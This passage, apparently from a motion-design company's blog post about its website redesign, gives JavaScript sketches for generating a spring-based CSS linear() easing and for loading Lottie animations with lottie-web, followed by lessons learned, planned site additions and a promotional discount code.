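    The spring-to-linear() idea mentioned above can be approximated in a few lines. The sketch below is my own simplification, not Jake Archibald’s actual generator: it samples the closed-form step response of an under-damped spring and joins the samples into a CSS linear() easing string.

```javascript
// Rough sketch of sampling a damped spring into a CSS linear() easing string.
// Assumes an under-damped spring (damping ratio < 1), which is what produces
// the "bouncy" overshoot. Parameter names and defaults are illustrative.
function springLinear(stiffness = 100, damping = 10, steps = 20) {
  const omega = Math.sqrt(stiffness);            // natural frequency (mass = 1)
  const zeta = damping / (2 * omega);            // damping ratio
  const wd = omega * Math.sqrt(1 - zeta * zeta); // damped frequency
  const stops = [];
  for (let i = 0; i <= steps; i++) {
    const t = i / steps;
    // Closed-form step response of an under-damped spring settling at 1.
    const y = 1 - Math.exp(-zeta * omega * t) *
      (Math.cos(wd * t) + ((zeta * omega) / wd) * Math.sin(wd * t));
    stops.push(y.toFixed(3));
  }
  return `linear(${stops.join(', ')})`;
}
```

    The resulting string can be dropped into a rule such as animation-timing-function, or stored in a custom property, which is essentially the paste-as-CSS-variables workflow the quote describes.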
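    On the Lottie side, integrating an exported animation with the open-source lottie-web player is typically a single loadAnimation() call. The helper below is an illustrative sketch (the function name, selectors, and file paths are my own assumptions, not Jitter’s code); it just assembles the options object that loadAnimation() expects.

```javascript
// Illustrative sketch: building the options for lottie-web's loadAnimation().
// In the browser the call would look like:
//
//   import lottie from 'lottie-web';
//   lottie.loadAnimation(lottieOptions(document.querySelector('.hero'), '/anims/hero.json'));
//
function lottieOptions(container, path) {
  return {
    container,       // DOM element the animation renders into
    renderer: 'svg', // vector output stays crisp and lightweight
    loop: true,
    autoplay: true,
    path,            // URL of the exported Lottie JSON
  };
}
```

    Because the exported files are JSON describing vector shapes, they stay small compared with video, which is what keeps the experience dynamic and lightweight.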

    What We Learned

    This redesign taught us a few valuable lessons:

    • Start with benefits, not features. Users don’t care what your product does until they understand how it can help them.
    • Design with your real audience in mind. Jitter for solo designers and Jitter for teams are two different stories. Clarifying our audience helped us craft a stronger, clearer narrative.
    • Prototyping with Jitter helped us move faster, iterate more confidently, and keep design and development in sync.

    We’ve already seen an impact: a sharper brand perception, higher engagement and conversion across all pages, and a new wave of qualified inbound leads from the best brands in the world, including Microsoft, Dropbox, Anthropic, Lyft, Workday, United Airlines, and more. And this is just the beginning.

    What’s Next?

    We see our new website as a constantly evolving platform. In the coming months, we’ll be adding more:

    • Case studies and customer stories
    • Use case pages
    • Learning resources and motion design tutorials
    • Playful experiments and interactive demos

    Our mission remains the same: to make motion design accessible, collaborative, and fun. Our website is now better equipped to carry that message forward.

    Let us know what you think, and if there’s anything you’d love to see next.

    Thanks for reading, and stay in motion 🚀

    Give Jitter a Try

    Get started with Jitter for free and explore 300+ free templates to jumpstart your next project. Once you’re ready to upgrade, get 25% off the first year of paid annual plans with JITTERCODROPS25.


